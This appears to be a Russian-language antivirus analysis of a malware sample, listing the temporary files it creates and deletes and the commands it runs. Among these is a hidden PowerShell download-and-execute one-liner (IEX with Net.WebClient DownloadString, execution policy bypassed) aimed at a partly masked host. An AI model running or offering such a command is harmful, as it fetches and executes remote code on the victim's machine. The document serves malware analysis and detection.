Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://19#.168.7.1/try/me.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei27642\vcruntime140.dll
- %TEMP%\_mei27642\_bz2.pyd
- %TEMP%\_mei27642\_decimal.pyd
- %TEMP%\_mei27642\_hashlib.pyd
- %TEMP%\_mei27642\_lzma.pyd
- %TEMP%\_mei27642\_socket.pyd
- %TEMP%\_mei27642\base_library.zip
- %TEMP%\_mei27642\libcrypto-3.dll
- %TEMP%\_mei27642\python313.dll
- %TEMP%\_mei27642\select.pyd
- %TEMP%\_mei27642\unicodedata.pyd
Удаляет файлы, которые сам же создал
- %TEMP%\_mei27642\base_library.zip
- %TEMP%\_mei27642\libcrypto-3.dll
- %TEMP%\_mei27642\python313.dll
- %TEMP%\_mei27642\select.pyd
- %TEMP%\_mei27642\unicodedata.pyd
- %TEMP%\_mei27642\vcruntime140.dll
- %TEMP%\_mei27642\_bz2.pyd
- %TEMP%\_mei27642\_decimal.pyd
- %TEMP%\_mei27642\_hashlib.pyd
- %TEMP%\_mei27642\_lzma.pyd
- %TEMP%\_mei27642\_socket.pyd
Другое
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "cmd.exe /C powershell -nop -exec bypass -c """IEX (New-Object Net.WebClient).DownloadString('http://19#.168.7.1/try/me.exe')""";x" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C powershell -nop -exec bypass -c """IEX (New-Object Net.WebClient).DownloadString('http://19#.168.7.1/try/me.exe')""";x
